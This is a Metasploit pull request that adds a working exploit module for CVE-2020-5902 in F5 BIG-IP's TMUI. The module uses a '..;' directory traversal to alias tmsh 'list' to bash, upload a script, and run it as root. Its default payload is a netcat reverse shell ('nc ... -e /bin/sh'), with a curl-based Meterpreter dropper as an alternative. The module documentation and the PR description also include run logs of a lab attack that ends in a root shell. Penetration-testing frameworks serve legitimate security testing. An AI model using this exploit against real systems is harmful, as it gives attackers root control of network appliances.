### PR TITLE
Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)

### DIFF
--- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
@@ -79,25 +79,25 @@ Exploit target:
    0   Unix Command
 
 
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.176
-rhosts => 172.16.249.176
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
-lhost => 172.16.249.1
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.163.145
+rhosts => 172.16.163.145
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.163.1
+lhost => 172.16.163.1
 msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
 
-[+] nc 172.16.249.1 4444 -e /bin/sh
-[*] Started reverse TCP handler on 172.16.249.1:4444
+[+] nc 172.16.163.1 4444 -e /bin/sh
+[*] Started reverse TCP handler on 172.16.163.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target is vulnerable. Target is running BIG-IP 14.1.2.
 [*] Creating alias list=bash
 [+] Successfully created alias list=bash
 [*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
-[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh
-[*] Uploading /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
-[+] Successfully uploaded /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
-[*] Executing /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
-[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.176:44736) at 2020-07-06 18:05:24 -0500
-[+] Deleted /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
+[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
+[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
+[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
+[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
+[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
+[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
 [*] Deleting alias list=bash
 [+] Successfully deleted alias list=bash
 

--- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a directory traversal in F5's BIG-IP Traffic
+Management User Interface (TMUI) to upload a shell script and execute
+it as the root user.
+
+Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
+15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
+in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
+
+Tested on the VMware OVA release of 14.1.2.
+
+### Setup
+
+Download
+[BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
+and import it into your desired virtualization software.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### WritableDir
+
+Set this to a writable directory in which files will be dropped.
+Defaults to `/tmp`.
+
+## Scenarios
+
+### F5 BIG-IP 14.1.2 in VMware Fusion
+
+```
+msf5 > use exploit/linux/http/f5_bigip_tmui_rce
+[*] Using configured payload cmd/unix/reverse_netcat_gaping
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
+
+Module options (exploit/linux/http/f5_bigip_tmui_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_netcat_gaping):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.176
+rhosts => 172.16.249.176
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
+
+[+] nc 172.16.249.1 4444 -e /bin/sh
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
+[*] Creating alias list=bash
+[+] Successfully created alias list=bash
+[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
+[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh
+[*] Uploading /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
+[+] Successfully uploaded /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
+[*] Executing /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.176:44736) at 2020-07-06 18:05:24 -0500
+[+] Deleted /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
+[*] Deleting alias list=bash
+[+] Successfully deleted alias list=bash
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
+uname -a
+Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'SSL' => true
+          'SSL' => true,
+          'WfsDelay' => 5
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -173,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'command' => "list #{script_path}"
       }
-    }, 0)
+    }, 3.5)
   end
 
   def delete_alias

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -58,8 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => [ARCH_X86, ARCH_X64],
             'Type' => :linux_dropper,
             'DefaultOptions' => {
-              'CMDSTAGER::FLAVOR' => :curl,
-              'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
+              'CMDSTAGER::FLAVOR' => :bourne,
+              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
             }
           ]
         ],
@@ -69,8 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5
         },
         'Notes' => {
-          'Stability' => [CRASH_SAFE],
-          'Reliability' => [FIRST_ATTEMPT_FAIL], # Seems a little finicky atm
+          'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service
+          'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky
           'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
         }
       )
@@ -121,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper
       execute_cmdstager
     end
-  ensure
-    delete_alias
+
+    delete_alias if @created_alias
   end
 
   def create_alias
@@ -139,6 +139,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res && res.code == 200 && res.get_json_document['error'].blank?
       fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')
     end
+
+    @created_alias = true
 
     print_good('Successfully created alias list=bash')
   end

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2020-5902'],
           ['URL', 'https://support.f5.com/csp/article/K52145254']
-          # PoC courtesy of F5's advisory above: <LocationMatch ".*\.\.;.*">
         ],
         'DisclosureDate' => '2020-06-30', # Vendor advisory
         'License' => MSF_LICENSE,
@@ -84,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp',
+      'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),
       'vars_post' => {
         'fileName' => '/etc/f5-release'
       }
@@ -122,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),
       'vars_post' => {
         'command' => 'create cli alias private list command bash'
       }
@@ -147,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp',
+      'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),
       'vars_post' => {
         'fileName' => script_path,
         'content' => cmd
@@ -168,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi({
       'method' => 'POST',
-      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),
       'vars_post' => {
         'command' => "list #{script_path}"
       }
@@ -180,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),
       'vars_post' => {
         'command' => 'delete cli alias private list'
       }
@@ -192,6 +191,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_good('Successfully deleted alias list=bash')
+  end
+
+  def dir_trav(path)
+    # PoC courtesy of the referenced F5 advisory: <LocationMatch ".*\.\.;.*">
+    normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)
   end
 
   def script_path

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -58,8 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'SSL' => true,
-          'AutoCheck' => false # TODO: Remove this once check is implemented!
+          'SSL' => true
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -83,7 +82,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    CheckCode::Unsupported('I need to implement this!')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp',
+      'vars_post' => {
+        'fileName' => '/etc/f5-release'
+      }
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && /BIG-IP release (?<version>[\d.]+)/ =~ res.body
+      return CheckCode::Unknown('Target did not respond with BIG-IP version.')
+    end
+
+    CheckCode::Detected("Target is running BIG-IP #{version}.")
   end
 
   def exploit

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -23,11 +23,13 @@ class MetasploitModule < Msf::Exploit::Remote
           it as the root user.
         },
         'Author' => [
+          'Mikhail Klyuchnikov', # Discovery
           'wvu' # Analysis and exploit
         ],
         'References' => [
           ['CVE', '2020-5902'],
-          ['URL', 'https://support.f5.com/csp/article/K52145254']
+          ['URL', 'https://support.f5.com/csp/article/K52145254'],
+          ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']
         ],
         'DisclosureDate' => '2020-06-30', # Vendor advisory
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -1,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',
+        'Description' => %q{
+          This module exploits a directory traversal in F5's BIG-IP Traffic
+          Management User Interface (TMUI) to upload a shell script and execute
+          it as the root user.
+        },
+        'Author' => [
+          'wvu' # Analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2020-5902'],
+          ['URL', 'https://support.f5.com/csp/article/K52145254']
+          # PoC courtesy of F5's advisory above: <LocationMatch ".*\.\.;.*">
+        ],
+        'DisclosureDate' => '2020-06-30', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => :curl,
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'AutoCheck' => false # TODO: Remove this once check is implemented!
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [FIRST_ATTEMPT_FAIL], # Seems a little finicky atm
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def check
+    CheckCode::Unsupported('I need to implement this!')
+  end
+
+  def exploit
+    create_alias
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  ensure
+    delete_alias
+  end
+
+  def create_alias
+    print_status('Creating alias list=bash')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'vars_post' => {
+        'command' => 'create cli alias private list command bash'
+      }
+    )
+
+    unless res && res.code == 200 && res.get_json_document['error'].blank?
+      fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')
+    end
+
+    print_good('Successfully created alias list=bash')
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    upload_script(cmd)
+    execute_script
+  end
+
+  def upload_script(cmd)
+    print_status("Uploading #{script_path}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp',
+      'vars_post' => {
+        'fileName' => script_path,
+        'content' => cmd
+      }
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to upload #{script_path}")
+    end
+
+    register_file_for_cleanup(script_path)
+
+    print_good("Successfully uploaded #{script_path}")
+  end
+
+  def execute_script
+    print_status("Executing #{script_path}")
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'vars_post' => {
+        'command' => "list #{script_path}"
+      }
+    }, 0)
+  end
+
+  def delete_alias
+    print_status('Deleting alias list=bash')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
+      'vars_post' => {
+        'command' => 'delete cli alias private list'
+      }
+    )
+
+    unless res && res.code == 200 && res.get_json_document['error'].blank?
+      print_warning('Failed to delete alias list=bash')
+      return
+    end
+
+    print_good('Successfully deleted alias list=bash')
+  end
+
+  def script_path
+    @script_path ||=
+      normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))
+  end
+
+end

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -95,10 +95,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless res.code == 200 && /BIG-IP release (?<version>[\d.]+)/ =~ res.body
-      return CheckCode::Unknown('Target did not respond with BIG-IP version.')
+      return CheckCode::Safe('Target did not respond with BIG-IP version.')
     end
 
-    CheckCode::Detected("Target is running BIG-IP #{version}.")
+    # If we got here, the directory traversal was successful
+    CheckCode::Vulnerable("Target is running BIG-IP #{version}.")
   end
 
   def exploit

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -21,6 +21,12 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a directory traversal in F5's BIG-IP Traffic
           Management User Interface (TMUI) to upload a shell script and execute
           it as the root user.
+
+          Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
+          15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
+          in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
+
+          Tested on the VMware OVA release of 14.1.2.
         },
         'Author' => [
           'Mikhail Klyuchnikov', # Discovery


### PR DESCRIPTION
# Merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

## If you're coming here from the Internet, please use the version in `master` (linked above), not the original commit. Thank you! See also: #13854 and #14003.

This module should get you a **Unix root shell** on an affected F5 BIG-IP if all goes well. This is **NOT** TMSH. It just goes through it. You may need to run the exploit a couple times until I fix the bugs.

```
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
```